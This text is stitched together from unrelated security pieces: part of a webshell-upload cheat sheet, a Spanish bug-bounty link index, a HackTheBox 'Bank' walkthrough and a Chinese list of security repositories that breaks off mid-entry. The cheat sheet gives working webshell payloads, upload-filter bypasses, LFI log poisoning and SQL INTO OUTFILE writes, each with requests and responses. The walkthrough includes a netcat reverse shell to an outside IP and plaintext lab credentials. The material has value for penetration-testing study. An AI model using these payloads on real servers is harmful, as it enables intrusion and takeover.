Https://website/wordpress-blog/wp-content/uploads/webshell.php?cmd=whoami ``` ``` Example 2 - Kentico -------------------- ➤ Step 1. Log into the Kentico admin console ➤ Step 2. Edit the list file extensions allowed to add '.asp' and '.aspx' ➤ Step 3. upload a '.aspx' or '.asp' webshell using the CMS native upoad file function ``` #### Technique 6 - Webshell upload by exploiting an insecure (writable) file share (CIFS) of a Windows IIS Web server (i.e., C:\inetpub\wwwroot\) ``` Example ➤ Step 1. Identify a file share of a Web server that is insecurely granting read & write permissions to all "Domain Users" over the folder 'C:\inetpub\wwwroot\' ➤ Step 2. Upload a webshell (.ASP or ASPX) in the folder 'C:\inetpub\wwwroot\' or 'C:\inetpub\wwwroot\application-name\' ➤ Step 3. Browse your webshell and execute OS commands Examples: - "http://x.x.x.x/Webshell.asp" - "http://x.x.x.x/application-name/Webshell.aspx" ``` #### Technique 7 - Webshell upload by abusing the insecure HTTP PUT method (WebDAV) ``` ➤ Step 1. Find an insecure Web server which accepts PUT HTTP method - Examples with CURL root@kali:~# curl -v -X OPTIONS http://x.x.x.x/test/ * Trying x.x.x.x... * TCP_NODELAY set * Connected to x.x.x.x (x.x.x.x) port 80 (#0) > OPTIONS /test/ HTTP/1.1 > Host: x.x.x.x > User-Agent: curl/7.60.0 > Accept: */* HTTP response: -------------- < HTTP/1.1 200 OK < DAV: 1,2 < MS-Author-Via: DAV < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK < Allow: OPTIONS, GET, HEAD, POST < Content-Length: 0 < Date: Wed, 15 Aug 2018 21:35:07 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host x.x.x.x left intact ➤ Step 2. Try to upload a simple text file with curl - curl -T test.txt http://www.sitename.com/foldername ➤ Step 3. If the text file was uploaded successfully, then upload a Webshell file - Examples with CURL $ curl -T webshell.jsp http://www.sitename.com/<path> $ curl -T webshell.asp http://www.sitename.com/<path> $ curl -T webshell.aspx http://www.sitename.com/<path> $ curl -T webshell.php http://www.sitename.com/<path> - Example of HTTP PUT request sent with Burp proxy (repeater) PUT /test/webshell.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 49 <?php echo shell_exec("id;pwd;uname -a;2>&1"); ?> HTTP response: -------------- HTTP/1.1 201 Created Content-Length: 0 Connection: close Date: Wed, 15 Aug 2018 19:38:26 GMT Server: lighttpd/1.4.28 ➤ Step 4. Execute OS commands using the Webshell - Examples with CURL $ http://www.sitename.com/<path>/webshell.php?cmd=whoami $ http://www.sitename.com/<path>/webshell.jsp?cmd=whoami $ http://www.sitename.com/<path>/webshell.asp?cmd=whoami ... - Example of exploitation with Burp proxy (repeater) GET /test/webshell.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 HTTP response: -------------- HTTP/1.1 200 OK X-Powered-By: PHP/5.3.10-1ubuntu3.21 Content-type: text/html <SNIP> uid=33(www-data) gid=33(www-data) groups=33(www-data) /var/www/test <SNIP> ``` #### Technique 8 - Webshell upload by exploiting a vulnerable file upload function ``` Example with a vulnerable PHP website ➤ Step 1. You found a file upload page "image_upload.php" and you tried to upload a webshell named "Webshell.php" but it was rejected. Possible root causes: - only the file name extensions '.png', '.gif' and '.jpg' are accepted or - the file name extension '.php' is forbidden ➤ Step 2. Simply modify the file extension of your webshell like "Webshell.php.png" or "Webshell.php5" or "Webshell.phtml" to bypass the checks based on the file extension - In general to bypass basic checks you can do the following: + Append the name of the file extension of your webshell + Adjust the content-type to match that of an accepted file-type + Include magic bytes for an accepted file - Using Burp proxy send the following POST HTTP request: POST /application/image_upload.php HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://x.x.x.x/application/upload.php Cookie: PHPSESSID=4e2jkta5ovnligfe6bchjgsop5 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------9005578534749094731954750866 Content-Length: 409 -----------------------------9005578534749094731954750866 Content-Disposition: form-data; name="fileToUpload"; filename="Webshell.php.png" Content-Type: application/x-php <?php echo shell_exec($_GET['cmd'].' 2>&1'); ?> -----------------------------9005578534749094731954750866 Content-Disposition: form-data; name="submit" Upload Image -----------------------------9005578534749094731954750866-- HTTP response: -------------- HTTP/1.1 302 Found <snip> location: main_login.php Content-Length: 104 Connection: close Content-Type: text/html; charset=UTF-8 <html> <body> Uploading, please wait<br />The file has been uploaded to /uploads <br /></body> </html> ➤ Step 3. Browse your webshell and execute OS commands - Using Burp proxy send the following POST HTTP request: GET /application/uploads/Webshell.php.png?cmd=id HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 HTTP response: -------------- HTTP/1.1 200 OK <SNIP> Connection: close Content-Type: text/html; charset=UTF-8 uid=48(apache) gid=48(apache) groups=48(apache) ``` #### Technique 9 - Webshell upload by exploiting a RFI vulnerability ``` Example ➤ Step 1. Review the content (php settings) of the page "/phpinfo.php" (e.g., identified with dirbuster) => allow_url_fopen : On => potential RFI => allow_url_include : On => potential RFI ➤ Step 2. Create a webshell and host it on a publicly available Web server Examples: - jeff@kali:~/$ echo "<?php echo shell_exec('uname;whoami;id;pwd;ls');?>" > webshell.php - jeff@kali:~/$ echo "<?php echo shell_exec('uname;whoami;id;pwd;ls');?>" > webshell - jeff@kali:~/$ sudo python3 -m http.server 80 ➤ Step 3. Find and exploit a Remote File Include (RFI) flaw using Burp proxy to execute OS commands with your webshell Example: - http://Website/index.php?p=http://x.x.x.x/webshell.php - http://x.x.x.x/application/fileviewer.php?p=http://x.x.x.x/webshell ``` #### Technique 10 - Webshell upload by exploiting a LFI vulnerability ``` Example ➤ Step 1. You find a website during an internal penetration test that is vulnerable to a Local File Include vulnerability and you can read log files such as '/var/log/auth.log' and '/var/log/mail' thanks to the LFI flaw. Examples: > http://website/index.php?lang=../../../../var/log/auth.log > http://website/index.php?lang=../../../../var/log/mail ➤ Step 2. Add a malicious PHP webshell in the log files '/var/log/auth.log' and '/var/log/mail', if you can attempt to log into the SSH server or if you can log anonymously into the SMTP server of the Linux server. Examples: -[SSH] root@kali:~# ssh '<?php echo system($_GET["cmd"]); exit; ?>'@X.X.X.X -[SMTP] root@kali:~# telnet X.X.X.X 25 Trying X.X.X.X... Connected to X.X.X.X. Escape character is '^]'. 220 straylight ESMTP Postfix (Debian/GNU) FROM anonymous@straylight 502 5.5.2 Error: command not recognized AIL FROM: anonymous@straylight 250 2.1.0 Ok RCPT TO: <?php echo shell_exec("id;pwd;uname -a;2>&1"); ?> 501 5.1.3 Bad recipient address syntax ➤ Step 3. Execute the PHP Webshell stored in the log files '/var/log/auth.log' and '/var/log/mail' via via the Local File Include vulnerability. Examples: > http://website/index.php?lang=../../../../var/log/auth.log&cmd=whoami + HTTP response: uid=33(www-data) gid=33(www-data) groups=33(www-data) > http://website/index.php?lang=../../../../var/log/mail + HTTP response containg the result of our OS commands: <html> <SNIP> Aug 23 18:45:28 straylight postfix/smtpd[2886]: connect from unknown[X.X.X.X] Aug 23 18:46:36 straylight postfix/smtpd[2886]: warning: Illegal address syntax from unknown[X.X.X.X] in RCPT command: uid=33(www-data) gid=33(www-data) groups=33(www-data) /var/www/html/ Linux server01 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 GNU/Linux <SNIP> ``` #### Technique 11 - Webshell upload by exploiting a SQL injection (SQLi) vulnerability ``` Example ➤ Step 1. Find a SQL injection vulnerability on a PHP website. The following pre-requites must be met: - the underlying MySQL database is installed on the same server than the Website - the Website is using a database account that has admin privileges over the MySQL database ➤ Step 2. Find or guess the Web server installation path (DocumenRoot) Web root folder (e.g., it can be found thanks to "http://x.x.x.x/<path>/phpinfo.php"). - Example for Windows - XAMP = 'C:\XAMPP\htdocs\' or 'C:\XAMPP\htdocs\<website-name>\' - Example for Linux - LAMP = '/var/www/' or '/var/www/https/<website-name>/wp-content/uploads/', etc ... ➤ Step 3. Using the SQL injection vulnerability, execute the following SQL query to write the Webshell in the Web root folder of the server Examples: - Linux server - "select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/<website-name>/uploads/Webshell.php";" - Windows server - "select "< ? $c = $_GET['cmd']; $op = shell_exec($c); echo $op ? >" into outfile "C:\\XAMPP\\htdocs\\<website-name>\\Webshell.php";" ➤ Step 4. Access to the 'Webshell.php' file with your web browser and execute OS commands Examples: - http://x.x.x.x/<website-name>/uploads/Webshell.php?cmd=whoami - http://x.x.x.x/<website-name>/Webshell.php?cmd=whoami Note: Several PHP functions can be used in a webshell to execute OS commands such as + shell_exec() function: <?php echo shell_exec($_GET['cmd']); ?> + system() function: <?php system($_GET['cmd']); ?> + passthru() function: <?php echo passthru($_GET['cmd']); ?> + exec() function: <?php echo exec($_POST['cmd']); ?> ``` #### Technique 16 - Webshell upload using a Splunk administration console ``` ➤ Step 1. Download a Webshell customized for Splunk - https://github.com/dionach/Splunk-Web-Shell - https://github.com/TBGSecurity/splunk_shells ➤ Step 2. Log into the administrator portal of a Splunk instance (e.g. admin access is uncredentialed or default creds 'admin:changeme' have not been changed) - http://IP-splunk:8000/ or https://IP-splunk:8000/ ➤ Step 3. To deploy the Webshell you have to: - browse to "Manage Apps" and then click on "Install app from file", - click on "Choose File", select the "webShell.tar.gz" file and click on "Upload" - click on "Restart Splunk" - browse the new app (your Webshell) ``` ### II. List of common paths for the DocumentRoot directory (Web root folder) ``` ➤ XAMP (Windows) = "c:\XAMPP\htdocs" ➤ IIS (Windows) = "C:\inetpub\wwwroot" ➤ Websphere (Windows) = "c:/program files/ibm http server/htdocs" or "C:\WebSphere\IHS" ➤ Apache(Linux) = '/var/www' (configuration found in the file '/etc/httpd/conf/httpd.conf' or '/etc/apache2/sites-available/default') ➤ Apache(Linux) = "/var/www/html/example.com/" ➤ Apache(Unix) = “/usr/local/Apache2.2/htdocs” ➤ Apache(Windows) = “C:/Program Files/Apache Software Foundation/Apache2.2/htdocs/” ➤ NGINX (Linux) = '/data/www' or '/data/w3' or "/usr/local/nginx/html' (configuration files can be found in the directory: '/usr/local/nginx/conf' or /etc/nginx' or '/usr/local/etc/nginx') ``` ### III. Usefull Github links for Webshells ``` ➤ ASPX Webshell - https://github.com/tennc/webshell/tree/master/aspx/asp.net-backdoors ➤ ASP Webshell - https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/asp ➤ JAVA Webshell - https://github.com/SecurityRiskAdvisors/cmd.jsp ➤ JAVA Webshell - https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/jsp ➤ PHP Webshell - https://github.com/WhiteWinterWolf/wwwolf-php-webshell ➤ PHP Webshell - https://github.com/tennc/webshell/tree/master/fuzzdb-webshell/php ➤ Various Webshells - https://github.com/tennc/webshell ➤ Memory WebShell Generator - https://github.com/hosch3n/msmap ``` ### IV. Quickly set up a test environment using Docker #### Docker can be used to quickly set up a testing environment (https://hub.docker.com/search?q=) ``` For examples: ➤ docker pull tomcat ➤ docker pull phpmyadmin ➤ docker pull nginx ➤ docker pull ismaleiva90/weblogic12 ➤ docker pull jboss/keycloak ➤ docker pull wordpress ➤ .. ``` #### Projects like 'Vulhub' can also be very useful (https://github.com/vulhub/vulhub) ``` ➤ Jboss Web server - https://github.com/vulhub/vulhub/tree/master/jboss ➤ Tomcat Web server - https://github.com/vulhub/vulhub/tree/master/tomcat ➤ Weblogic Web server - https://github.com/vulhub/vulhub/tree/master/weblogic ➤ Nginx Web server - https://github.com/vulhub/vulhub/tree/master/nginx ➤ PhpMyAdmin portal - https://github.com/vulhub/vulhub/tree/master/phpmyadmin ➤ Jenkins server - https://github.com/vulhub/vulhub/tree/master/jenkins ➤ ... ```
# BugBountyTips BugBounty (Bypasses, Payloads, y más) ## Listas de Bypassing - [Bypass 2FA](https://github.com/xNaughty/BugBountyTips/blob/main/Bypass%202FA.md) - [Bypass Captcha](https://github.com/xNaughty/BugBountyTips/blob/main/Bypass%20Captcha.md) - [Bypass 403](https://github.com/xNaughty/BugBountyTips/blob/main/Bypass%20403.md) ## Listas de Vulnerabilidades - [Arbitrary File Upload](https://github.com/xNaughty/BugBountyTips/blob/main/Arbitrary%20File%20Upload.md) - [Local File Inclusion (LFI)](https://github.com/xNaughty/BugBountyTips/blob/main/Local%20File%20Inclusion.md) - [Remote File Inclusion (RFI)](https://github.com/xNaughty/BugBountyTips/blob/main/Remote%20File%20Inclusion.md) - [Insecure Direct Object Reference (IDOR)](https://github.com/xNaughty/BugBountyTips/blob/main/Insecure%20Direct%20Object%20References.md) - [Open Redirect](https://github.com/xNaughty/BugBountyTips/blob/main/Open%20Redirect.md) - [Cross Site Scripting (XSS)](https://github.com/xNaughty/BugBountyTips/blob/main/Cross%20Site%20Scripting.md) ## Dorks - [Shodan](https://github.com/xNaughty/BugBountyTips/blob/main/Shodan%20Dorks.md)
![](images/boxInfo.png) # Recon ## nmap ```console root@kali:~# nmap -sC -sV 10.10.10.29 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 20:35 EDT Nmap scan report for 10.10.10.29 Host is up (0.55s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA) | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA) | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA) |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519) 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 96.61 seconds ``` ## gobuster ```bash gobuster dir -u 10.10.10.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 ``` gobuster didn't gave any results for 10.10.10.29 `searchsploit isc bind` --> all exploits for `ISC BIND 9.9.5` were denial of service so not useful adding `10.10.10.29` to `/etc/hosts` as `bank.htb` and then visiting bank.htb gave a login page ![](images/loginPage.png) sqlmap didn't gave any results for the login page running gobuster for `bank.htb` gave `/assets` and `/inc` which contain some files but they were not useful ```bash gobuster dir -u bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 ``` ![](images/gobuster.png) ![](images/assets.png) # Plain Text Creds visiting `/balance-transfer` we see a lot of `.acc` files with username emailID and password in encrypted hex ![](images/balanceTransfer.png) ![](images/encryptedCreds.png) there might be something important in one of these files so we can try to find a file of different size than others most files that I see are between 582-585 in size so I used `curl` and `grep` to find a different file ```bash curl http://bank.htb/balance-transfer/ | grep -v '/td><td align="right">58' ``` ![](images/curl.png) we can see in the output of above command that `68576f20e9732f1b2edc4df5b8533230.acc` is just 257 bytes this file had username emailID and password in plain text ![](images/acc_creds.png) # Reverse Shell we can now login using `[email protected]:!##HTBB4nkP4ssw0rd!##` and there is a file upload functionality in `/support.php` trying to upload php file give error that only image upload is allowed ![](images/phpError.png) in the source code of /support.php we can see this comment ![](images/comment.png) uploading php file with `.htb` extension allows to execute php code after uploading `shell.htb` we can visit the following URL to get a shell ``` http://bank.htb/uploads/shell.htb?c=nc 10.10.14.31 8888 -e /bin/bash ``` ![](images/reverseShell.png) # Alternate Way ## Improper Redirect we can also upload the shell.htb file without having to login as chris because of improper redirect `/support.php` gets redirected to `/login.php` if we are not logged in but it also gives the content of /support.php before the redirect so we can still upload the file without login by changing the `302 FOUND` to `200 OK` in burp and then access the uploaded file from `/uploads/shell.htb` as curl does not allow redirect by default we can curl /support.php to see that it gives "302 FOUND" but still gives the content ![](images/improperRedirect.png) # privEsc ## Method 1 - SUID found an uncommon suid binary ``` find / -perm -u=s 2>/dev/null ``` ![](images/privEsc.png) ## Method 2 - /etc/passwd looking through the results of `LinEnum.sh`, we can see that we have write access on /etc/passwd so we can either change the root password or add another user in /etc/passwd to get root shell ![](images/etcPasswd_permissions.png) we can use openssl to generate the encrypted password ![](images/openssl.png) ![](images/nano_etcPasswd.png) after adding a new user with root privileges we can either switch user using `su` or SSH as that user ![](images/su.png) ![](images/ssh_poison.png) ![](images/prize.png)
# 所有收集类项目: - [收集的所有开源工具: sec-tool-list](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式 - [安全资源收集类的 Repo](https://github.com/alphaSeclab/awesome-security-collection): 1000+各类安全资源收集的Github Repo - [全平台逆向资源](https://github.com/alphaSeclab/awesome-reverse-engineering): - Windows平台安全: PE/DLL/DLL-Injection/Dll-Hijack/Dll-Load/UAC-Bypass/Sysmon/AppLocker/ETW/WSL/.NET/Process-Injection/Code-Injection/DEP/Kernel/... - Linux安全: ELF/... - macOS/iXxx安全: Mach-O/越狱/LLDB/XCode/... - Android安全: HotFix/XPosed/Pack/Unpack/Emulator/Obfuscate - 知名工具: IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/... - [攻击性网络安全资源](https://github.com/alphaSeclab/awesome-cyber-security): 漏洞/渗透/物联网安全/数据渗透/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/免杀/CobaltStrike/侦查/OSINT/社工/密码/凭证/威胁狩猎/Payload/WifiHacking/无线攻击/后渗透/提权/UAC绕过/... - [网络相关的安全资源](https://github.com/alphaSeclab/awesome-network-stuff): - 网络通信: 代理/SS/V2ray/GFW/反向代理/隧道/VPN/Tor/I2P/... - 网络攻击: 中间人/PortKnocking/... - 网络分析: 嗅探/协议分析/网络可视化/网络分析/网络诊断等 - [开源远控和恶意远控分析报告](https://github.com/alphaSeclab/awesome-rat): 开源远控工具: Windows/Linux/macOS/Android; 远控类恶意恶意代码的分析报告等 - [Webshell工具和分析/使用文章](https://github.com/alphaSeclab/awesome-webshell): Webshell资源收集, 包括150个Github项目, 200个左右文章 - [取证相关工具和文章](https://github.com/alphaSeclab/awesome-forensics): 近300个取开源取证工具,近600与取证相关文章 - [蜜罐资源](https://github.com/alphaSeclab/awesome-honeypot): 250+个开源蜜罐工具,350+与蜜罐相关文章 - [Burp Suite资源](https://github.com/alphaSeclab/awesome-burp-suite): 400+个开源Burp插件,500+与Burp相关文章 # collection - 1000+ Github 安全资源收集类的 Repos. - [English Version](https://github.com/alphaSeclab/awesome-security-collection/blob/master/Readme_en.md) # 目录 - [收集](#7ac28aec578da6492a0bb6a8c4b8594a) - [(974) 收集](#8c5a692b5d26527ef346687e047c5c21) - [(54) 笔记&&文章&&教程](#9f9fed5b730bc5bfceaaf77da3aa719e) - [(20) Wordlist](#6a5d962d62378399d7e12c1690188e7a) - [(15) 爬虫](#cf11bcd58b4ec7a549bfb11297003180) # <a id="7ac28aec578da6492a0bb6a8c4b8594a"></a>收集 *** ## <a id="8c5a692b5d26527ef346687e047c5c21"></a>收集 - [**34045**星][1m] [Py] [minimaxir/big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) “淘气”的字符串列表,当作为用户输入时很容易引发问题 - [**33101**星][3m] [hack-with-github/awesome-hacking](https://github.com/hack-with-github/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers - [**24868**星][18d] [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. - [**22055**星][30d] [PHP] [danielmiessler/seclists](https://github.com/danielmiessler/seclists) 多种类型资源收集:用户名、密码、URL、敏感数据类型、Fuzzing Payload、WebShell等 - [**19766**星][3m] [Jupyter Notebook] [camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers](https://github.com/camdavidsonpilon/probabilistic-programming-and-bayesian-methods-for-hackers) aka "Bayesian Methods for Hackers": An introduction to Bayesian methods + probabilistic programming with a computation/understanding-first, mathematics-second point of view. All in pure Python ;) - [**18703**星][3y] [fallibleinc/security-guide-for-developers](https://github.com/fallibleinc/security-guide-for-developers) Security Guide for Developers (实用性开发人员安全须知) - [**14867**星][2m] [gfwlist/gfwlist](https://github.com/gfwlist/gfwlist) gfwlist - [**11389**星][13d] [Py] [swisskyrepo/payloadsallthethings](https://github.com/swisskyrepo/payloadsallthethings) A list of useful payloads and bypass for Web Application Security and Pentest/CTF - [**11306**星][12d] [Py] [owasp/cheatsheetseries](https://github.com/owasp/cheatsheetseries) The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. - [**10944**星][2m] [CSS] [hacker0x01/hacker101](https://github.com/hacker0x01/hacker101) Hacker101 - [**10920**星][1m] [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) 渗透测试资源/工具集 - [**10615**星][20d] [ruanyf/weekly](https://github.com/ruanyf/weekly) 科技爱好者周刊,每周五发布 - [**9042**星][3m] [vitalysim/awesome-hacking-resources](https://github.com/vitalysim/awesome-hacking-resources) A collection of hacking / penetration testing resources to make you better! - [**8031**星][3m] [Py] [facebook/chisel](https://github.com/facebook/chisel) Chisel is a collection of LLDB commands to assist debugging iOS apps. - [**5586**星][1m] [rshipp/awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis) A curated list of awesome malware analysis tools and resources. - [**5229**星][4m] [Py] [ytisf/thezoo](https://github.com/ytisf/thezoo) A repository of LIVE malwares for your own joy and pleasure. - [**5181**星][27d] [PHP] [tennc/webshell](https://github.com/tennc/webshell) webshell收集 - [**5121**星][3m] [sbilly/awesome-security](https://github.com/sbilly/awesome-security) 与安全相关的软件、库、文档、书籍、资源和工具等收集 - [**5084**星][17d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册 - [**4441**星][2m] [Shell] [zardus/ctf-tools](https://github.com/zardus/ctf-tools) Some setup scripts for security research tools. - [**4306**星][17d] [Shell] [ashishb/android-security-awesome](https://github.com/ashishb/android-security-awesome) A collection of android security related resources - [**4252**星][1m] [qazbnm456/awesome-web-security](https://github.com/qazbnm456/awesome-web-security) web 安全资源列表 - [**4115**星][10m] [wtsxdev/reverse-engineering](https://github.com/wtsxdev/reverse-engineering) List of awesome reverse engineering resources - [**4014**星][3m] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares - [**4014**星][3m] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares - [**3945**星][5m] [PHP] [paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) A curated list of resources for learning about application security - [**3922**星][15d] [Py] [secureauthcorp/impacket](https://github.com/SecureAuthCorp/impacket) Python类收集, 用于与网络协议交互 - [**3868**星][2m] [jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) OSINT资源收集 - [**3836**星][4y] [iosre/iosappreverseengineering](https://github.com/iosre/iosappreverseengineering) The world’s 1st book of very detailed iOS App reverse engineering skills :) - [**3796**星][18d] [Py] [paralax/awesome-honeypots](https://github.com/paralax/awesome-honeypots) an awesome list of honeypot resources - [**3699**星][5m] [C] [secwiki/windows-kernel-exploits](https://github.com/secwiki/windows-kernel-exploits) windows-kernel-exploits Windows平台提权漏洞集合 - [**3627**星][28d] [HTML] [consensys/smart-contract-best-practices](https://github.com/consensys/smart-contract-best-practices) A guide to smart contract security best practices - [**3616**星][19d] [blacckhathaceekr/pentesting-bible](https://github.com/blacckhathaceekr/pentesting-bible) links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources. - [**3517**星][10m] [C] [rpisec/mbe](https://github.com/rpisec/mbe) Course materials for Modern Binary Exploitation by RPISEC - [**3461**星][30d] [C] [shellphish/how2heap](https://github.com/shellphish/how2heap) 学习各种堆利用技巧的repo - [**3383**星][11d] [jivoi/awesome-ml-for-cybersecurity](https://github.com/jivoi/awesome-ml-for-cybersecurity) 针对网络安全的机器学习资源列表 - [**3320**星][2y] [scanate/ethlist](https://github.com/scanate/ethlist) The Comprehensive Ethereum Reading List - [**3301**星][15d] [Shell] [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. - [**3230**星][16d] [Rich Text Format] [the-art-of-hacking/h4cker](https://github.com/The-Art-of-Hacking/h4cker) 资源收集:hacking、渗透、数字取证、事件响应、漏洞研究、漏洞开发、逆向 - [**3203**星][6m] [hslatman/awesome-threat-intelligence](https://github.com/hslatman/awesome-threat-intelligence) A curated list of Awesome Threat Intelligence resources - [**3198**星][16d] [Makefile] [lorien/awesome-web-scraping](https://github.com/lorien/awesome-web-scraping) List of libraries, tools and APIs for web scraping and data processing. - [**3168**星][18d] [CSS] [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) Curated list of public penetration test reports released by several consulting firms and academic security groups - [**3141**星][17d] [meirwah/awesome-incident-response](https://github.com/meirwah/awesome-incident-response) A curated list of tools for incident response - [**3005**星][10d] [Py] [felixonmars/dnsmasq-china-list](https://github.com/felixonmars/dnsmasq-china-list) Chinese-specific configuration to improve your favorite DNS server. Best partner for chnroutes. - [**2977**星][2y] [phith0n/mind-map](https://github.com/phith0n/mind-map) 各种安全相关思维导图整理收集 - [**2967**星][11d] [Go] [dominikh/go-tools](https://github.com/dominikh/go-tools) Staticcheck – a collection of static analysis tools for working with Go code - [**2904**星][3m] [infosecn1nja/red-teaming-toolkit](https://github.com/infosecn1nja/red-teaming-toolkit) A collection of open source and commercial tools that aid in red team operations. - [**2816**星][2m] [paulsec/awesome-sec-talks](https://github.com/paulsec/awesome-sec-talks) A collected list of awesome security talks - [**2800**星][3m] [secwiki/sec-chart](https://github.com/secwiki/sec-chart) 安全思维导图集合 - [**2759**星][1m] [JS] [s0md3v/awesomexss](https://github.com/s0md3v/AwesomeXSS) Awesome XSS stuff - [**2680**星][14d] [rmusser01/infosec_reference](https://github.com/rmusser01/infosec_reference) An Information Security Reference That Doesn't Suck - [**2671**星][1y] [HTML] [chybeta/web-security-learning](https://github.com/chybeta/web-security-learning) Web-Security-Learning - [**2660**星][18d] [xairy/linux-kernel-exploitation](https://github.com/xairy/linux-kernel-exploitation) Linux 内核 Fuzz 和漏洞利用的资源收集 - [**2621**星][2m] [pditommaso/awesome-pipeline](https://github.com/pditommaso/awesome-pipeline) A curated list of awesome pipeline toolkits inspired by Awesome Sysadmin - [**2615**星][1m] [JS] [knownsec/kcon](https://github.com/knownsec/kcon) KCon is a famous Hacker Con powered by Knownsec Team. - [**2519**星][27d] [onlurking/awesome-infosec](https://github.com/onlurking/awesome-infosec) A curated list of awesome infosec courses and training resources. - [**2499**星][5y] [PHP] [audi-1/sqli-labs](https://github.com/audi-1/sqli-labs) SQLI labs to test error based, Blind boolean based, Time based. - [**2474**星][2m] [Py] [0xinfection/awesome-waf](https://github.com/0xinfection/awesome-waf) Everything awesome about web application firewalls (WAFs). - [**2419**星][3y] [rpisec/malware](https://github.com/rpisec/malware) Course materials for Malware Analysis by RPISEC - [**2395**星][3y] [OCaml] [facebookarchive/pfff](https://github.com/facebookarchive/pfff) 一堆工具的集合,用于执行静态分析、代码可视化、代码导航、保持格式的源码转换(例如:源码重构)。完美支持C、Java、JS、PHP,后续将支持其他一大堆语言。 - [**2356**星][12m] [hack-with-github/free-security-ebooks](https://github.com/hack-with-github/free-security-ebooks) Free Security and Hacking eBooks - [**2345**星][22d] [yeyintminthuhtut/awesome-red-teaming](https://github.com/yeyintminthuhtut/awesome-red-teaming) List of Awesome Red Teaming Resources - [**2307**星][1m] [PS] [k8gege/k8tools](https://github.com/k8gege/k8tools) K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetNuke/zabbix) - [**2228**星][2y] [JS] [cure53/h5sc](https://github.com/cure53/h5sc) HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors - [**2204**星][2m] [sobolevn/awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) A curated list of cryptography resources and links. - [**2184**星][3y] [enddo/awesome-windows-exploitation](https://github.com/enddo/awesome-windows-exploitation) A curated list of awesome 